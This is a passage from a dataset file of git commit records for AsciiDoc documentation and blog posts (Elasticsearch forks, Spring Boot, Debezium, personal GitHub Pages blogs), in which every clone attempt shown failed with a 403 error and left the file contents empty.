arch,knight1128\/elasticsearch,pranavraman\/elasticsearch,sc0ttkclark\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,huanzhong\/elasticsearch,gmarz\/elasticsearch,kunallimaye\/elasticsearch,LeoYao\/elasticsearch,yynil\/elasticsearch,maddin2016\/elasticsearch,awislowski\/elasticsearch,markwalkom\/elasticsearch,xingguang2013\/elasticsearch,sneivandt\/elasticsearch,bestwpw\/elasticsearch,nilabhsagar\/elasticsearch,btiernay\/elasticsearch,rmuir\/elasticsearch,jango2015\/elasticsearch,kingaj\/elasticsearch,karthikjaps\/elasticsearch,s1monw\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,bestwpw\/elasticsearch,JackyMai\/elasticsearch,MichaelLiZhou\/elasticsearch,JackyMai\/elasticsearch,yongminxia\/elasticsearch,hafkensite\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,kaneshin\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,girirajsharma\/elasticsearch,zkidkid\/elasticsearch,mohit\/elasticsearch,Rygbee\/elasticsearch,bestwpw\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,sc0ttkclark\/elasticsearch,ulkas\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,vietlq\/elasticsearch,weipinghe\/elasticsearch,AndreKR\/elasticsearch,glefloch\/elasticsearch,hafkensite\/elasticsearch,wbowling\/elasticsearch,girirajsharma\/elasticsearch,Uiho\/elasticsearch,mcku\/elasticsearch,rento19962\/elasticsearch,nazarewk\/elasticsearch,zhiqinghuang\/elasticsearch,huanzhong\/elasticsearch,nomoa\/elasticsearch,episerver\/elasticsearch,jbertouch\/elasticsearch,F0lha\/elasticsearch,mbrukman\/elasticsearch,C-Bish\/elasticsearch,cwurm\/elasticsearch,mcku\/elasticsearch,Uiho\/elasticsearch,awislowski\/elasticsearch,franklanganke\/elasticsearch,tebriel\/elasticsearch,dongjoon-hyun\/elasticsearch,nrkkalyan\/elasticsearch,PhaedrusTheGreek\/elasticsearch,tahaemin\/elasticsearch,jeteve\/elasticsearch,jpountz\/elasticsearch,MisterAndersen\/elasticsearch,sreeramjayan\/elasticsearch,JackyMai\/elasticsearch,xuzha\/elasticsearch,sc0ttkclark\/elasticsearch,nellicus\/elasticsearch,wangtuo\/elasticsearch,socialrank\/elasticsearch,MetSystem\/elasticsearch,spiegela\/elasticsearch,wbowling\/elasticsearch,Collaborne\/elasticsearch,yynil\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,awislowski\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,tahaemin\/elasticsearch,jeteve\/elasticsearch,achow\/elasticsearch,adrianbk\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,18098924759\/elasticsearch,jchampion\/elasticsearch,Helen-Zhao\/elasticsearch,socialrank\/elasticsearch,rmuir\/elasticsearch,ESamir\/elasticsearch,tebriel\/elasticsearch,mortonsykes\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,F0lha\/elasticsearch,knight1128\/elasticsearch,andrestc\/elasticsearch,achow\/elasticsearch,IanvsPoplicola\/elasticsearch,mbrukman\/elasticsearch,camilojd\/elasticsearch,PhaedrusTheGreek\/elasticsearch,brandonkearby\/elasticsearch,mmaracic\/elasticsearch,xingguang2013\/elasticsearch,KimTaehee\/elasticsearch,nomoa\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ckclark\/elasticsearch,kalburgimanjunath\/elasticsearch,kunallimaye\/elasticsearch,clintongormley\/elasticsearch,lmtwga\/elasticsearch,tahaemin\/elasticsearch,mm0\/elasticsearch,Stacey-Gammon\/elasticsearch,jpountz\/elasticsearch,yanjunh\/elasticsearch,MichaelLiZhou\/elasticsearch,btiernay\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,vroyer\/elassandra,vroyer\/elassandra,areek\/elasticsearch,elancom\/elasticsearch,kalimatas\/elasticsearch,jango2015\/elasticsearch,KimTaehee\/elasticsearch,infusionsoft\/elasticsearch,tahaemin\/elasticsearch,Ansh90\/elasticsearch,obourgain\/elasticsearch,mortonsykes\/elasticsearch,andrejserafim\/elasticsearch,StefanGor\/elasticsearch,huanzhong\/elasticsearch,ckclark\/elasticsearch,tahaemin\/elasticsearch,wbowling\/elasticsearch,kingaj\/elasticsearch,onegambler\/elasticsearch,lzo\/elasticsearch-1,IanvsPoplicola\/elasticsearch,xingguang2013\/elasticsearch,karthikjaps\/elasticsearch,mbrukman\/elasticsearch,gfyoung\/elasticsearch,sreeramjayan\/elasticsearch,IanvsPoplicola\/elasticsearch,rhoml\/elasticsearch,karthikjaps\/elasticsearch,kalburgimanjunath\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,JervyShi\/elasticsearch,PhaedrusTheGreek\/elasticsearch,tebriel\/elasticsearch,vroyer\/elassandra,weipinghe\/elasticsearch,Charlesdong\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,franklanganke\/elasticsearch,drewr\/elasticsearch,xuzha\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,martinstuga\/elasticsearch,LeoYao\/elasticsearch,kunallimaye\/elasticsearch,artnowo\/elasticsearch,lmtwga\/elasticsearch,jpountz\/elasticsearch,zhiqinghuang\/elasticsearch,mohit\/elasticsearch,lzo\/elasticsearch-1,masaruh\/elasticsearch,andrejserafim\/elasticsearch,areek\/elasticsearch,myelin\/elasticsearch,drewr\/elasticsearch,ZTE-PaaS\/elasticsearch,wittyameta\/elasticsearch,knight1128\/elasticsearch,MichaelLiZhou\/elasticsearch,kingaj\/elasticsearch,jbertouch\/elasticsearch,sc0ttkclark\/elasticsearch,mohit\/elasticsearch,zhiqinghuang\/elasticsearch,nazarewk\/elasticsearch,elancom\/elasticsearch,rento19962\/elasticsearch,lzo\/elasticsearch-1,onegambler\/elasticsearch,yongminxia\/elasticsearch,rento19962\/elasticsearch,pozhidaevak\/elasticsearch,artnowo\/elasticsearch,umeshdangat\/elasticsearch,myelin\/elasticsearch,mcku\/elasticsearch,nilabhsagar\/elasticsearch,mapr\/elasticsearch,i-am-Nathan\/elasticsearch,wbowling\/elasticsearch,mnylen\/elasticsearch,avikurapati\/elasticsearch,andrestc\/elasticsearch,nellicus\/elasticsearch,cnfire\/elasticsearch-1,obourgain\/elasticsearch,areek\/elasticsearch,wittyameta\/elasticsearch,naveenhooda2000\/elasticsearch,ouyangkongtong\/elasticsearch,MetSystem\/elasticsearch,njlawton\/elasticsearch,martinstuga\/elasticsearch,sreeramjayan\/elasticsearch,btiernay\/elasticsearch,xuzha\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,18098924759\/elasticsearch,henakamaMSFT\/elasticsearch,jchampion\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,18098924759\/elasticsearch,wimvds\/elasticsearch,yanjunh\/elasticsearch,obourgain\/elasticsearch,franklanganke\/elasticsearch,Uiho\/elasticsearch,uschindler\/elasticsearch,Collaborne\/elasticsearch,wenpos\/elasticsearch,kaneshin\/elasticsearch,jpountz\/elasticsearch,zhiqinghuang\/elasticsearch,spiegela\/elasticsearch,caengcjd\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,zkidkid\/elasticsearch,fernandozhu\/elasticsearch,weipinghe\/elasticsearch,nazarewk\/elasticsearch,weipinghe\/elasticsearch,himanshuag\/elasticsearch,polyfractal\/elasticsearch,awislowski\/elasticsearch,strapdata\/elassandra5-rc,kalburgimanjunath\/elasticsearch,ricardocerq\/elasticsearch,kaneshin\/elasticsearch,clintongormley\/elasticsearch,jango2015\/elasticsearch,polyfractal\/elasticsearch,hafkensite\/elasticsearch,bawse\/elasticsearch,pranavraman\/elasticsearch,bawse\/elasticsearch,markharwood\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra5-rc,mm0\/elasticsearch,clintongormley\/elasticsearch,F0lha\/elasticsearch,alexshadow007\/elasticsearch,diendt\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,kingaj\/elasticsearch,vroyer\/elasticassandra,mgalushka\/elasticsearch,F0lha\/elasticsearch,springning\/elasticsearch,LewayneNaidoo\/elasticsearch,tebriel\/elasticsearch,Collaborne\/elasticsearch,jimczi\/elasticsearch,yynil\/elasticsearch,himanshuag\/elasticsearch,sdauletau\/elasticsearch,fforbeck\/elasticsearch,winstonewert\/elasticsearch,ouyangkongtong\/elasticsearch,drewr\/elasticsearch,episerver\/elasticsearch,henakamaMSFT\/elasticsearch,kalburgimanjunath\/elasticsearch,vroyer\/elasticassandra,wittyameta\/elasticsearch,umeshdangat\/elasticsearch,infusionsoft\/elasticsearch,kunallimaye\/elasticsearch,masterweb121\/elasticsearch,liweinan0423\/elasticsearch,diendt\/elasticsearch,mm0\/elasticsearch,lydonchandra\/elasticsearch,scorpionvicky\/elasticsearch,mapr\/elasticsearch,MetSystem\/elasticsearch,karthikjaps\/elasticsearch,kalimatas\/elasticsearch,girirajsharma\/elasticsearch,jchampion\/elasticsearch,rmuir\/elasticsearch,masterweb121\/elasticsearch,schonfeld\/elasticsearch,nknize\/elasticsearch,mapr\/elasticsearch,jchampion\/elasticsearch,YosuaMichael\/elasticsearch,coding0011\/elasticsearch,karthikjaps\/elasticsearch,palecur\/elasticsearch,maddin2016\/elasticsearch,lzo\/elasticsearch-1,caengcjd\/elasticsearch,s1monw\/elasticsearch,liweinan0423\/elasticsearch,coding0011\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,infusionsoft\/elasticsearch,qwerty4030\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,HonzaKral\/elasticsearch,MichaelLiZhou\/elasticsearch,cnfire\/elasticsearch-1,ZTE-PaaS\/elasticsearch,tahaemin\/elasticsearch,mm0\/elasticsearch,henakamaMSFT\/elasticsearch,schonfeld\/elasticsearch,ZTE-PaaS\/elasticsearch,yynil\/elasticsearch,andrejserafim\/elasticsearch,gfyoung\/elasticsearch,pranavraman\/elasticsearch,onegambler\/elasticsearch,LeoYao\/elasticsearch,hafkensite\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/mapping\/fields\/source-field.asciidoc","new_file":"docs\/reference\/mapping\/fields\/source-field.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8706a5a7b4f9e8e327bccc1fffcc181d2242c44f","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4423bfa4430a1cc8341a31909cf7159fd8ab23d","subject":"Update 2016-10-09-Running-fish-on-Windows-10.adoc","message":"Update 2016-10-09-Running-fish-on-Windows-10.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-10-09-Running-fish-on-Windows-10.adoc","new_file":"_posts\/2016-10-09-Running-fish-on-Windows-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2524e3e8897a8839b3fc2ca999761c4468afdfcd","subject":"Update 2018-06-01-FW4SPL-161-released.adoc","message":"Update 2018-06-01-FW4SPL-161-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2018-06-01-FW4SPL-161-released.adoc","new_file":"_posts\/2018-06-01-FW4SPL-161-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a50acce7024f39784e4b9eb8ef4b22c140620737","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e914b89c9c1a7fc169a3f113b2902cd41df91c28","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31e1458b369375aac9fcdabbc9842236a1681f6e","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"019855a599bbe5fffb9a6a88f7d2fbc34cbd1c74","subject":"Update 2016-06-02-hello.adoc","message":"Update 2016-06-02-hello.adoc","repos":"chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io","old_file":"_posts\/2016-06-02-hello.adoc","new_file":"_posts\/2016-06-02-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chdask\/chdask.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41030865cb14bbe37258e4b9efb06ebcc1c46f4d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8e9f9c8c5ce398bbe721162fa2fac1a7777da70","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d71da5890ff9fad607f8761b6c67a95d3b5dfb7e","subject":"Quarkus blogpost","message":"Quarkus blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-03-14-debezium-meets-quarkus.adoc","new_file":"blog\/2019-03-14-debezium-meets-quarkus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a330bd380df8acc2f1e34d9e1c600fe9263deebd","subject":"Adding release announcement for 0.5.2","message":"Adding release announcement for 0.5.2\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-08-17-debezium-0-5-2-is-out.adoc","new_file":"blog\/2017-08-17-debezium-0-5-2-is-out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef925158e309cedd42fd28efa0750b53174fee67","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"194a7a0c9bc4b911408e7cd81abb61daa599996a","subject":"Fix broken links to Gradle and Maven tools, and CLI samples in README","message":"Fix broken links to Gradle and Maven tools, and CLI samples in README\n\nCloses gh-12776\n","repos":"scottfrederick\/spring-boot,royclarkson\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,NetoDevel\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot,habuma\/spring-boot,rweisleder\/spring-boot,yangdd1205\/spring-boot,mbenson\/spring-boot,zhanhb\/spring-boot,michael-simons\/spring-boot,mbenson\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,zhanhb\/spring-boot,rweisleder\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,ptahchiev\/spring-boot,habuma\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,shakuzen\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,donhuvy\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,rweisleder\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,htynkn\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,ilayaperumalg\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,rweisleder\/spring-boot,felipeg48\/spring-boot,spring-projects\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,shakuzen\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,felipeg48\/spring-boot,bclozel\/spring-boot,ptahchiev\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,tiarebalbi\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,zhanhb\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,chrylis\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,felipeg48\/spring-boot,lburgazzoli\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,lburgazzoli\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,ilayaperumalg\/spring-boot,ptahchiev\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,yangdd1205\/spring-boot,hello2009chen\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,NetoDevel\/spring-boot,shakuzen\/spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,shakuzen\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,Buzzardo\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,habuma\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"783ef6826173fd99400f4a907e6fbce3fb3414c8","subject":"Adding pypi version badge to readme.","message":"Adding pypi version badge to readme.\n","repos":"hypatia-software-org\/hypatia-engine,Applemann\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia,brechin\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ed1639c4ab998e4bae7f943f89657ac84d7ce7b","subject":"Publish 2016-12-2-3-D.adoc","message":"Publish 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-D.adoc","new_file":"2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"418ee094cc30ffd442d7b7928fe5d4d85c5df9b1","subject":"add news","message":"add news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/03\/04\/clojure1-10-3.adoc","new_file":"content\/news\/2021\/03\/04\/clojure1-10-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c0ad8baf000633d01a0dc9b9e43b150f73ed0ef6","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a6ff1776d1d8db992eaeeaa5fb8797cb877e15e","subject":"try-out: Add a set of quote examples","message":"try-out: Add a set of quote examples\n\nThis is used to exercise the quote and aquote environments.\n\nSigned-off-by: Otavio Salvador <1d31b11c1b92bf5d043d36edfe7174db39a6b891@ossystems.com.br>\n","repos":"jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,asciidoctor\/asciidoctor-latex","old_file":"try-out\/quote.adoc","new_file":"try-out\/quote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/asciidoctor-latex.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a914fcb55716ead8e0bbd8a03cde869c9be1ea28","subject":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95d7e0bb21cdb8db71b1ae29970076c183b269ee","subject":"Update 2016-11-12-231900-Saturday-Remainder.adoc","message":"Update 2016-11-12-231900-Saturday-Remainder.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-12-231900-Saturday-Remainder.adoc","new_file":"_posts\/2016-11-12-231900-Saturday-Remainder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df75c33a3799ba46fc06e66927c0cb8f61d01299","subject":"Update 2019-11-26-The-Bluster-A-Short-Story.adoc","message":"Update 2019-11-26-The-Bluster-A-Short-Story.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-11-26-The-Bluster-A-Short-Story.adoc","new_file":"_posts\/2019-11-26-The-Bluster-A-Short-Story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bcaafda4847484e99d8353e4d34e676d4fdc793","subject":"y2b create post ZOMBIE EDITION SURVIVAL BOX","message":"y2b create post ZOMBIE EDITION SURVIVAL 